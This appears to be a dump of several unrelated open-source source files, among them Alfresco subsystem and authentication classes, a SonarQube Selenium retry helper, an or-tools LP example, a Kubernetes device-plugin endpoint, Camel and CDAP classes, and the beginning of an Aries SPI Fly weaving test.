import org.springframework.aop.framework.ProxyFactoryBean;
import org.springframework.aop.support.DefaultPointcutAdvisor;
import org.springframework.beans.BeansException;
import org.springframework.beans.factory.NoSuchBeanDefinitionException;
import org.springframework.context.ApplicationContext;
import org.springframework.context.ApplicationContextAware;
/**
* A factory bean, normally used in conjunction with {@link ChildApplicationContextFactory} allowing selected
* interfaces in a child application context to be proxied by a bean in the parent application context. This allows
* 'hot-swapping' and reconfiguration of entire subsystems.
*/
public class SubsystemProxyFactory extends ProxyFactoryBean implements ApplicationContextAware
{
    private static final long serialVersionUID = -4186421942840611218L;

    /** The source application context factory. */
    private ApplicationContextFactory sourceApplicationContextFactory;

    /** Bean name used to resolve the factory lazily from the parent context when no direct reference is set. */
    private String sourceApplicationContextFactoryName;

    /** The parent application context in which this proxy factory itself is defined. */
    private ApplicationContext applicationContext;

    /** An optional bean name to look up in the source application context **/
    private String sourceBeanName;

    /** Guards the cached state below: {@link #context}, {@link #sourceBean} and {@link #typedBeans}. */
    private ReentrantReadWriteLock lock = new ReentrantReadWriteLock();

    /** Child application context last obtained from the factory; a change signals a subsystem restart. */
    private ApplicationContext context;

    /** Bean cached by name when {@link #sourceBeanName} is set, otherwise null. */
    private Object sourceBean;

    /** Optional fallback bean used when the subsystem or the target bean is unavailable. */
    private Object defaultBean;

    /** Cache of target beans keyed by the declaring interface of the invoked method. */
    private Map <Class<?>, Object> typedBeans = new HashMap<Class<?>, Object>(7);

    /**
     * Instantiates a new managed subsystem proxy factory.
     * Every call through the proxy is routed per-invocation to a bean in the
     * current child application context, located by {@link #locateBean(MethodInvocation)}.
     */
    public SubsystemProxyFactory()
    {
        addAdvisor(new DefaultPointcutAdvisor(new MethodInterceptor()
        {
            public Object invoke(MethodInvocation mi) throws Throwable
            {
                Method method = mi.getMethod();
                try
                {
                    return method.invoke(locateBean(mi), mi.getArguments());
                }
                catch (InvocationTargetException e)
                {
                    // Unwrap invocation target exceptions
                    throw e.getTargetException();
                }
            }
        }));
    }

    @SuppressWarnings("unchecked")
    @Override
    public void setInterfaces(Class[] interfaces)
    {
        super.setInterfaces(interfaces);
        // Make it possible to export the object via JMX
        setTargetClass(getObjectType());
    }

    /**
     * Sets the source application context factory by name.
     *
     * @param sourceApplicationContextFactoryName
     *            the name of the sourceApplicationContextFactory to set
     */
    public void setSourceApplicationContextFactoryName(String sourceApplicationContextFactoryName)
    {
        this.sourceApplicationContextFactoryName = sourceApplicationContextFactoryName;
    }

    /**
     * Sets the source application context factory by reference
     *
     * @param sourceApplicationContextFactory
     *            the sourceApplicationContextFactory to set
     */
    public void setSourceApplicationContextFactory(ApplicationContextFactory sourceApplicationContextFactory)
    {
        this.sourceApplicationContextFactory = sourceApplicationContextFactory;
    }

    /**
     * Resolves the factory: prefers the directly injected reference, otherwise
     * looks it up by name in the parent context. Returns null when the named
     * factory bean does not exist (e.g. the subsystem is absent).
     */
    private ApplicationContextFactory getSourceApplicationContextFactory()
    {
        if (sourceApplicationContextFactory != null)
        {
            return sourceApplicationContextFactory;
        }
        else
        {
            try
            {
                return applicationContext.getBean(sourceApplicationContextFactoryName, ApplicationContextFactory.class);
            } catch (NoSuchBeanDefinitionException e)
            {
                return null;
            }
        }
    }

    @Override
    public void setApplicationContext(ApplicationContext applicationContext) throws BeansException
    {
        this.applicationContext = applicationContext;
    }

    /**
     * Sets an optional bean name to target all calls to in the source application context. If not set, an appropriate
     * bean is looked up based on method class.
     *
     * @param sourceBeanName
     *            the sourceBeanName to set
     */
    public void setSourceBeanName(String sourceBeanName)
    {
        this.sourceBeanName = sourceBeanName;
    }

    /**
     * Sets an optional default bean to be used if the target bean is not found. Generally used when a subsystem does not
     * exist.
     *
     * @param defaultBean
     *            the defaultBean to set
     */
    public void setDefaultBean(Object defaultBean)
    {
        this.defaultBean = defaultBean;
    }

    // Bring our cached copies of the source beans in line with the application context factory, using a RW lock to
    // ensure consistency
    protected Object locateBean(MethodInvocation mi)
    {
        boolean haveWriteLock = false;
        this.lock.readLock().lock();
        try
        {
            ApplicationContextFactory sourceApplicationContextFactory = getSourceApplicationContextFactory();
            if (sourceApplicationContextFactory != null)
            {
                ApplicationContext newContext = sourceApplicationContextFactory.getApplicationContext();
                if (this.context != newContext)
                {
                    // Upgrade the lock
                    // NOTE(review): ReentrantReadWriteLock cannot upgrade atomically; this is a
                    // release-then-reacquire. Another thread may refresh the cache in the gap,
                    // which is why the context is re-fetched under the write lock below.
                    this.lock.readLock().unlock();
                    this.lock.writeLock().lock();
                    haveWriteLock = true;
                    newContext = sourceApplicationContextFactory.getApplicationContext();
                    this.context = newContext;
                    // The child context was swapped: invalidate all cached beans.
                    this.typedBeans.clear();
                    this.sourceBean = null;
                    if (this.sourceBeanName != null)
                    {
                        this.sourceBean = newContext.getBean(this.sourceBeanName);
                    }
                }
                if (this.sourceBean == null)
                {
                    // No fixed bean name: route by the interface that declares the invoked method.
                    Method method = mi.getMethod();
                    Class<?> type = method.getDeclaringClass();
                    Object bean = this.typedBeans.get(type);
                    if (bean == null)
                    {
                        // Upgrade the lock if necessary
                        if (!haveWriteLock)
                        {
                            this.lock.readLock().unlock();
                            this.lock.writeLock().lock();
                            haveWriteLock = true;
                        }
                        // Re-check after the (non-atomic) lock hand-off: another thread may have
                        // populated the cache meanwhile.
                        bean = this.typedBeans.get(type);
                        if (bean == null)
                        {
                            Map<?, ?> beans = this.context.getBeansOfType(type);
                            if (beans.size() == 0 && defaultBean != null)
                            {
                                // Fall back to the default; note it is deliberately not cached in typedBeans.
                                bean = defaultBean;
                            }
                            else
                            {
                                // Routing is only well-defined for exactly one matching bean.
                                if (beans.size() != 1)
                                {
                                    throw new RuntimeException("Don't know where to route call to method " + method);
                                }
                                bean = beans.values().iterator().next();
                                this.typedBeans.put(type, bean);
                            }
                        }
                    }
                    return bean;
                }
                return this.sourceBean;
            }
            else
            {
                // Subsystem (factory) not available at all: use the default, if any.
                return defaultBean;
            }
        }
        finally
        {
            // Release whichever lock we currently hold.
            if (haveWriteLock)
            {
                this.lock.writeLock().unlock();
            }
            else
            {
                this.lock.readLock().unlock();
            }
        }
    }
}
| Alfresco/alfresco-repository | src/main/java/org/alfresco/repo/management/subsystems/SubsystemProxyFactory.java | Java | lgpl-3.0 | 9,452 |
/*
* SonarQube, open source software quality management tool.
* Copyright (C) 2008-2014 SonarSource
* mailto:contact AT sonarsource DOT com
*
* SonarQube is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* SonarQube is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
package selenium;
import com.google.common.base.Predicate;
import com.google.common.base.Supplier;
import org.openqa.selenium.InvalidElementStateException;
import org.openqa.selenium.NotFoundException;
import org.openqa.selenium.StaleElementReferenceException;
import org.openqa.selenium.WebDriverException;
import java.util.NoSuchElementException;
import java.util.concurrent.TimeUnit;
import static java.util.concurrent.TimeUnit.SECONDS;
/**
 * Retries a Selenium interaction until it succeeds or a fixed timeout elapses.
 * Transient WebDriver failures (stale/not-yet-rendered elements) are swallowed
 * during the loop; once the timeout is reached the last recorded error is
 * rethrown. A dot is printed per failed attempt as a progress indicator.
 */
class Retry {
  public static final Retry _30_SECONDS = new Retry(30, SECONDS);

  private final long timeoutInMs;

  Retry(long duration, TimeUnit timeUnit) {
    this.timeoutInMs = timeUnit.toMillis(duration);
  }

  /**
   * Repeatedly evaluates {@code target} and, once it yields a present value,
   * applies {@code action} to it and returns.
   *
   * @throws WebDriverException     the last driver error seen, if the timeout elapses
   * @throws NoSuchElementException if the timeout elapses with no driver error recorded
   */
  <T> void execute(Supplier<Optional<T>> target, Consumer<T> action) {
    WebDriverException lastError = null;
    boolean retried = false;

    long start = System.currentTimeMillis();
    while ((System.currentTimeMillis() - start) < timeoutInMs) {
      try {
        Optional<T> targetElement = target.get();
        if (targetElement.isPresent()) {
          action.accept(targetElement.get());
          if (retried) {
            System.out.println();
          }
          return;
        }
      } catch (StaleElementReferenceException e) {
        // ignore: the element was re-rendered, simply try again
      } catch (WebDriverException e) {
        lastError = e;
      }

      retried = true;
      System.out.print(".");
    }

    failAfterTimeout(retried, lastError);
  }

  /**
   * Repeatedly runs {@code action} until it completes without a WebDriver
   * error. (The original declared an unused type parameter {@code <T>} on this
   * overload; it has been removed, which is invisible to normal call sites.)
   *
   * @throws WebDriverException     the last driver error seen, if the timeout elapses
   * @throws NoSuchElementException if the timeout elapses with no driver error recorded
   */
  void execute(Runnable action) {
    WebDriverException lastError = null;
    boolean retried = false;

    long start = System.currentTimeMillis();
    while ((System.currentTimeMillis() - start) < timeoutInMs) {
      try {
        action.run();
        if (retried) {
          System.out.println();
        }
        return;
      } catch (StaleElementReferenceException e) {
        // ignore: transient DOM refresh, retry
      } catch (WebDriverException e) {
        lastError = e;
      }

      retried = true;
      System.out.print(".");
    }

    failAfterTimeout(retried, lastError);
  }

  /**
   * Shared failure tail for the two execute overloads: finishes the
   * progress-dot line, then rethrows the last recorded WebDriverException, or
   * a NoSuchElementException when no error was captured.
   */
  private void failAfterTimeout(boolean retried, WebDriverException lastError) {
    if (retried) {
      System.out.println();
    }
    if (lastError != null) {
      throw lastError;
    }
    throw new NoSuchElementException("Not found");
  }

  /**
   * Repeatedly evaluates {@code predicate} against the supplied target until
   * it holds or the timeout elapses.
   *
   * @return true on success, false on a plain timeout
   * @throws NoSuchElementException if the last failure was a NotFoundException
   */
  <T> boolean verify(Supplier<T> targetSupplier, Predicate<T> predicate) throws NoSuchElementException {
    Error error = Error.KO;
    boolean retried = false;

    long start = System.currentTimeMillis();
    while ((System.currentTimeMillis() - start) < timeoutInMs) {
      try {
        if (predicate.apply(targetSupplier.get())) {
          if (retried) {
            System.out.println();
          }
          return true;
        }
        error = Error.KO;
      } catch (InvalidElementStateException e) {
        error = Error.KO;
      } catch (NotFoundException e) {
        error = Error.NOT_FOUND;
      } catch (StaleElementReferenceException e) {
        // ignore: transient DOM refresh, retry
      }

      retried = true;
      System.out.print(".");
    }

    if (retried) {
      System.out.println();
    }
    if (error == Error.NOT_FOUND) {
      throw new NoSuchElementException("Not found");
    }
    return false;
  }

  /** Distinguishes "condition evaluated false" (KO) from "element missing" (NOT_FOUND). */
  enum Error {
    NOT_FOUND, KO
  }
}
| abbeyj/sonarqube | it/it-tests/src/test/java/selenium/Retry.java | Java | lgpl-3.0 | 4,076 |
/*
* #%L
* Alfresco Repository
* %%
* Copyright (C) 2005 - 2016 Alfresco Software Limited
* %%
* This file is part of the Alfresco software.
* If the software was purchased under a paid Alfresco license, the terms of
* the paid license agreement will prevail. Otherwise, the software is
* provided under the following open source license terms:
*
* Alfresco is free software: you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Alfresco is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with Alfresco. If not, see <http://www.gnu.org/licenses/>.
* #L%
*/
package org.alfresco.repo.security.authentication;
import org.alfresco.filesys.auth.ftp.FTPAuthenticatorBase;
import org.alfresco.jlan.ftp.FTPSrvSession;
import org.alfresco.jlan.server.auth.ClientInfo;
import java.util.List;
/**
* Base chaining FTP Authenticator class. Where appropriate, methods will 'chain' across multiple
* {@link FTPAuthenticatorBase} instances, as returned by {@link #getUsableFtpAuthenticators()}.
*
* @author alex.mukha
* @since 4.2.1
*/
public abstract class AbstractChainingFtpAuthenticator extends FTPAuthenticatorBase
{
    /**
     * Walks the chain of usable FTP authenticators and reports success as soon
     * as one of them accepts the supplied client credentials.
     *
     * @param info the client details to authenticate
     * @param sess the FTP server session making the request
     * @return <code>true</code> if any chained authenticator accepts the user,
     *         <code>false</code> if every authenticator rejects it
     */
    @Override
    public boolean authenticateUser(ClientInfo info, FTPSrvSession sess)
    {
        boolean accepted = false;
        for (FTPAuthenticatorBase candidate : getUsableFtpAuthenticators())
        {
            if (candidate.authenticateUser(info, sess))
            {
                // First successful authenticator wins; no need to consult the rest.
                accepted = true;
                break;
            }
        }
        return accepted;
    }

    /**
     * Gets the FTP authenticators across which methods will chain.
     *
     * @return the usable FTP authenticators
     */
    protected abstract List<FTPAuthenticatorBase> getUsableFtpAuthenticators();
}
| Alfresco/alfresco-repository | src/main/java/org/alfresco/repo/security/authentication/AbstractChainingFtpAuthenticator.java | Java | lgpl-3.0 | 2,217 |
/*
* #%L
* Alfresco Repository
* %%
* Copyright (C) 2005 - 2016 Alfresco Software Limited
* %%
* This file is part of the Alfresco software.
* If the software was purchased under a paid Alfresco license, the terms of
* the paid license agreement will prevail. Otherwise, the software is
* provided under the following open source license terms:
*
* Alfresco is free software: you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Alfresco is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with Alfresco. If not, see <http://www.gnu.org/licenses/>.
* #L%
*/
package org.alfresco.repo.search.impl.solr;
/**
* Identifies an attempt to use a disabled feature.
*
* @author Matt Ward
*/
public class DisabledFeatureException extends RuntimeException
{
private static final long serialVersionUID = 1L;
DisabledFeatureException(String message)
{
super(message);
}
} | Alfresco/alfresco-repository | src/main/java/org/alfresco/repo/search/impl/solr/DisabledFeatureException.java | Java | lgpl-3.0 | 1,375 |
# Copyright 2011 Hakan Kjellerstrand hakank@bonetmail.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Volsay problem in Google or-tools.
From the OPL model volsay.mod
Using arrays.
This model was created by Hakan Kjellerstrand (hakank@bonetmail.com)
Also see my other Google CP Solver models:
http://www.hakank.org/google_or_tools/
"""
from __future__ import print_function
from ortools.linear_solver import pywraplp
def main(unused_argv):
  """Solves the Volsay production-planning LP with the CLP backend.

  Maximizes 40*Gas + 50*Chloride subject to two shared capacity
  constraints, then prints the objective value, the production levels,
  and the reduced cost of each variable.

  Args:
    unused_argv: accepted for app-style entry-point symmetry; ignored.
  """
  # Create the solver.
  # using GLPK
  # solver = pywraplp.Solver('CoinsGridGLPK',
  #                          pywraplp.Solver.GLPK_LINEAR_PROGRAMMING)
  # Using CLP
  solver = pywraplp.Solver('CoinsGridCLP',
                           pywraplp.Solver.CLP_LINEAR_PROGRAMMING)
  # Problem data: two products, indexed into the `production` variable list.
  num_products = 2
  Gas = 0
  Chloride = 1
  products = ['Gas', 'Chloride']
  # Decision variables: production quantity per product, bounded [0, 100000].
  production = [solver.NumVar(0, 100000, 'production[%i]' % i)
                for i in range(num_products)]
  #
  # constraints
  #
  solver.Add(production[Gas] + production[Chloride] <= 50)
  solver.Add(3 * production[Gas] + 4 * production[Chloride] <= 180)
  # Objective. Maximize() registers the objective on the solver; its return
  # value is not useful, so the previous unused `objective` local is dropped.
  solver.Maximize(40 * production[Gas] + 50 * production[Chloride])
  print('NumConstraints:', solver.NumConstraints())
  #
  # solution and search
  #
  solver.Solve()
  print()
  print('objective = ', solver.Objective().Value())
  for i in range(num_products):
    print(products[i], '=', production[i].SolutionValue(), end=' ')
    print('ReducedCost = ', production[i].ReducedCost())


if __name__ == '__main__':
  main('Volsay')
| WendellDuncan/or-tools | examples/python/volsay2.py | Python | apache-2.0 | 2,080 |
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package deviceplugin
import (
"fmt"
"net"
"sync"
"time"
"github.com/golang/glog"
"golang.org/x/net/context"
"google.golang.org/grpc"
pluginapi "k8s.io/kubernetes/pkg/kubelet/apis/deviceplugin/v1alpha"
)
// endpoint maps to a single registered device plugin. It is responsible
// for managing gRPC communications with the device plugin and caching
// device states reported by the device plugin.
type endpoint interface {
	// run blocks, consuming the plugin's ListAndWatch stream and pushing
	// device-state changes into the cache and the registered callback.
	run()
	// stop shuts the endpoint down (implementation not shown in this file).
	stop()
	// allocate requests allocation of the given device IDs from the plugin
	// (presumably via the Allocate RPC -- confirm in the implementation).
	allocate(devs []string) (*pluginapi.AllocateResponse, error)
	// getDevices returns a snapshot of the cached device states.
	getDevices() []pluginapi.Device
	// callback reports device additions/updates/deletions for resourceName.
	callback(resourceName string, added, updated, deleted []pluginapi.Device)
}
// endpointImpl is the concrete endpoint backed by a gRPC connection to the
// device plugin's unix socket.
type endpointImpl struct {
	client     pluginapi.DevicePluginClient // gRPC client created by dial()
	clientConn *grpc.ClientConn             // underlying connection returned by dial()

	socketPath   string // unix socket path the plugin was dialed on
	resourceName string // resource name this endpoint serves

	devices map[string]pluginapi.Device // cached device states (keyed by device ID)
	mutex   sync.Mutex                  // guards devices

	cb monitorCallback // invoked with (resourceName, added, updated, deleted)
}
// newEndpointImpl creates a new endpoint for the given resourceName, dialing
// the plugin's unix socket at socketPath. The devices map seeds the device
// cache and callback is invoked on subsequent device-state changes. Returns
// an error (after logging it) if the gRPC connection cannot be established.
func newEndpointImpl(socketPath, resourceName string, devices map[string]pluginapi.Device, callback monitorCallback) (*endpointImpl, error) {
	client, c, err := dial(socketPath)
	if err != nil {
		glog.Errorf("Can't create new endpoint with path %s err %v", socketPath, err)
		return nil, err
	}

	return &endpointImpl{
		client:     client,
		clientConn: c,

		socketPath:   socketPath,
		resourceName: resourceName,

		devices: devices,
		cb:      callback,
	}, nil
}
// callback forwards device add/update/delete notifications to the
// monitorCallback supplied at construction time.
func (e *endpointImpl) callback(resourceName string, added, updated, deleted []pluginapi.Device) {
	e.cb(resourceName, added, updated, deleted)
}
// getDevices returns a snapshot slice of the cached device states.
func (e *endpointImpl) getDevices() []pluginapi.Device {
	e.mutex.Lock()
	defer e.mutex.Unlock()

	var snapshot []pluginapi.Device
	for _, device := range e.devices {
		snapshot = append(snapshot, device)
	}
	return snapshot
}
// run initializes ListAndWatch gRPC call for the device plugin and
// blocks on receiving ListAndWatch gRPC stream updates. Each ListAndWatch
// stream update contains a new list of device states. listAndWatch compares the new
// device states with its cached states to get list of new, updated, and deleted devices.
// It then issues a callback to pass this information to the device manager which
// will adjust the resource available information accordingly.
func (e *endpointImpl) run() {
	stream, err := e.client.ListAndWatch(context.Background(), &pluginapi.Empty{})
	if err != nil {
		glog.Errorf(errListAndWatch, e.resourceName, err)
		return
	}

	// Work on a local copy of the cached device map so the stream-processing
	// loop below does not need to hold e.mutex while diffing.
	devices := make(map[string]pluginapi.Device)

	e.mutex.Lock()
	for _, d := range e.devices {
		devices[d.ID] = d
	}
	e.mutex.Unlock()

	for {
		response, err := stream.Recv()
		if err != nil {
			// Stream errors terminate this endpoint's watch loop.
			glog.Errorf(errListAndWatch, e.resourceName, err)
			return
		}

		devs := response.Devices
		glog.V(2).Infof("State pushed for device plugin %s", e.resourceName)

		// Diff the freshly received device list against the local cache,
		// classifying each device as added or updated (health change).
		newDevs := make(map[string]*pluginapi.Device)
		var added, updated []pluginapi.Device

		for _, d := range devs {
			dOld, ok := devices[d.ID]
			newDevs[d.ID] = d

			if !ok {
				// First time we see this device: record it as added.
				glog.V(2).Infof("New device for Endpoint %s: %v", e.resourceName, d)

				devices[d.ID] = *d
				added = append(added, *d)

				continue
			}

			// Known device: only a health transition counts as an update.
			if d.Health == dOld.Health {
				continue
			}

			if d.Health == pluginapi.Unhealthy {
				glog.Errorf("Device %s is now Unhealthy", d.ID)
			} else if d.Health == pluginapi.Healthy {
				glog.V(2).Infof("Device %s is now Healthy", d.ID)
			}

			devices[d.ID] = *d
			updated = append(updated, *d)
		}

		// Anything remaining in the cache that is absent from the new list
		// was deleted by the plugin.
		var deleted []pluginapi.Device
		for id, d := range devices {
			if _, ok := newDevs[id]; ok {
				continue
			}

			glog.Errorf("Device %s was deleted", d.ID)

			deleted = append(deleted, d)
			delete(devices, id)
		}

		e.mutex.Lock()
		// NOTE: Return a copy of 'devices' instead of returning a direct reference to local 'devices'
		e.devices = make(map[string]pluginapi.Device)
		for _, d := range devices {
			e.devices[d.ID] = d
		}
		e.mutex.Unlock()

		// Notify the device manager of this round's changes.
		e.callback(e.resourceName, added, updated, deleted)
	}
}
// allocate issues Allocate gRPC call to the device plugin.
func (e *endpointImpl) allocate(devs []string) (*pluginapi.AllocateResponse, error) {
	request := &pluginapi.AllocateRequest{
		DevicesIDs: devs,
	}
	return e.client.Allocate(context.Background(), request)
}
// stop closes the gRPC connection to the device plugin, terminating any
// in-flight ListAndWatch stream. The Close error is deliberately ignored.
func (e *endpointImpl) stop() {
	e.clientConn.Close()
}
// dial establishes the gRPC communication with the registered device plugin. https://godoc.org/google.golang.org/grpc#Dial
func dial(unixSocketPath string) (pluginapi.DevicePluginClient, *grpc.ClientConn, error) {
	// Custom dialer: the target is a unix socket path, not a host:port.
	dialUnix := func(addr string, timeout time.Duration) (net.Conn, error) {
		return net.DialTimeout("unix", addr, timeout)
	}

	conn, err := grpc.Dial(unixSocketPath,
		grpc.WithInsecure(),
		grpc.WithBlock(),
		grpc.WithTimeout(10*time.Second),
		grpc.WithDialer(dialUnix),
	)
	if err != nil {
		return nil, nil, fmt.Errorf(errFailedToDialDevicePlugin+" %v", err)
	}

	return pluginapi.NewDevicePluginClient(conn), conn, nil
}
| lichen2013/kubernetes | pkg/kubelet/cm/deviceplugin/endpoint.go | GO | apache-2.0 | 5,390 |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.camel.component.sparkrest;
import org.apache.camel.CamelContext;
import org.apache.camel.support.DefaultMessage;
import spark.Request;
import spark.Response;
/**
* Spark based {@link org.apache.camel.Message}.
* <p/>
* This implementation allows direct access to the Spark {@link Request} using
* the {@link #getRequest()} method.
*/
public class SparkMessage extends DefaultMessage {

    // transient: Spark's Request/Response are bound to the current HTTP
    // exchange and are not meant to travel with a serialized message.
    private final transient Request request;
    private final transient Response response;

    /**
     * Creates a message wrapping the current Spark HTTP exchange.
     *
     * @param camelContext the Camel context this message belongs to
     * @param request      the underlying Spark HTTP request
     * @param response     the underlying Spark HTTP response
     */
    public SparkMessage(CamelContext camelContext, Request request, Response response) {
        super(camelContext);
        this.request = request;
        this.response = response;
    }

    /** @return the underlying Spark HTTP request */
    public Request getRequest() {
        return request;
    }

    /** @return the underlying Spark HTTP response */
    public Response getResponse() {
        return response;
    }

    /**
     * Creates a fresh SparkMessage sharing the same request/response pair.
     */
    @Override
    public DefaultMessage newInstance() {
        return new SparkMessage(getCamelContext(), request, response);
    }
}
| ullgren/camel | components/camel-spark-rest/src/main/java/org/apache/camel/component/sparkrest/SparkMessage.java | Java | apache-2.0 | 1,767 |
/*
* Copyright © 2015 Cask Data, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package co.cask.cdap.api.dataset.lib;
import co.cask.cdap.api.mapreduce.MapReduceTaskContext;
/**
* Responsible for dynamically determining a @{link PartitionKey}.
* For each K, V pair, the getPartitionKey(K, V) method is called to determine a PartitionKey.
*
* @param <K> Type of key
* @param <V> Type of value
*/
public abstract class DynamicPartitioner<K, V> {

  /**
   * Initializes a DynamicPartitioner.
   * <p>
   * This method will be called only once per {@link DynamicPartitioner} instance. It is the first method call
   * on that instance.
   * </p>
   * @param mapReduceTaskContext the mapReduceTaskContext for the task that this DynamicPartitioner is running in.
   *                             Note that the hadoop context is not available on this MapReduceTaskContext.
   */
  public void initialize(MapReduceTaskContext<K, V> mapReduceTaskContext) {
    // do nothing by default; subclasses may override to set up per-task state
  }

  /**
   * Destroys a DynamicPartitioner.
   * <p>
   * This method will be called only once per {@link DynamicPartitioner} instance. It is the last method call
   * on that instance.
   * </p>
   */
  public void destroy() {
    // do nothing by default; subclasses may override to release resources
  }

  /**
   * Determine the PartitionKey for the key-value pair to be written to.
   *
   * @param key the key to be written
   * @param value the value to be written
   * @return the {@link PartitionKey} for the key-value pair to be written to.
   */
  public abstract PartitionKey getPartitionKey(K key, V value);
}
| chtyim/cdap | cdap-api/src/main/java/co/cask/cdap/api/dataset/lib/DynamicPartitioner.java | Java | apache-2.0 | 2,078 |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.aries.spifly.dynamic;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.security.ProtectionDomain;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.Dictionary;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Hashtable;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import javax.xml.parsers.DocumentBuilderFactory;
import org.apache.aries.spifly.BaseActivator;
import org.apache.aries.spifly.SpiFlyConstants;
import org.apache.aries.spifly.Streams;
import org.easymock.EasyMock;
import org.easymock.IAnswer;
import org.junit.After;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import org.osgi.framework.Bundle;
import org.osgi.framework.BundleContext;
import org.osgi.framework.BundleReference;
import org.osgi.framework.Version;
import org.osgi.framework.hooks.weaving.WeavingHook;
import org.osgi.framework.hooks.weaving.WovenClass;
import org.osgi.framework.wiring.BundleRevision;
import org.osgi.framework.wiring.BundleWiring;
public class ClientWeavingHookTest {
    // Fresh activator per test; installed as the global BaseActivator.activator in setUp().
    DynamicWeavingActivator activator;

    // Class name of the DocumentBuilderFactory implementation shipped by the
    // running JVM; the expected result when no alternative provider is chosen.
    private static final String thisJVMsDBF = DocumentBuilderFactory.newInstance().getClass().getName();
    @Before
    public void setUp() {
        // BaseActivator.activator is the global lookup point for woven code,
        // so each test installs its own fresh activator there.
        activator = new DynamicWeavingActivator();
        BaseActivator.activator = activator;
    }
    @After
    public void tearDown() {
        // Clear the global reference so tests cannot leak state into each other.
        BaseActivator.activator = null;
        activator = null;
    }
@Test
public void testBasicServiceLoaderUsage() throws Exception {
Dictionary<String, String> consumerHeaders = new Hashtable<String, String>();
consumerHeaders.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "*");
// Register the bundle that provides the SPI implementation.
Bundle providerBundle = mockProviderBundle("impl1", 1);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(consumerHeaders, providerBundle);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle("spifly", Version.parseVersion("1.9.4"), consumerBundle, providerBundle);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
Assert.assertNotNull("Precondition", clsUrl);
String clientClassName = "org.apache.aries.spifly.dynamic.TestClient";
WovenClass wc = new MyWovenClass(clsUrl, clientClassName, consumerBundle);
Assert.assertEquals("Precondition", 0, wc.getDynamicImports().size());
wh.weave(wc);
Assert.assertEquals(1, wc.getDynamicImports().size());
String di1 = "org.apache.aries.spifly;bundle-symbolic-name=spifly;bundle-version=1.9.4";
String di2 = "org.apache.aries.spifly;bundle-version=1.9.4;bundle-symbolic-name=spifly";
String di = wc.getDynamicImports().get(0);
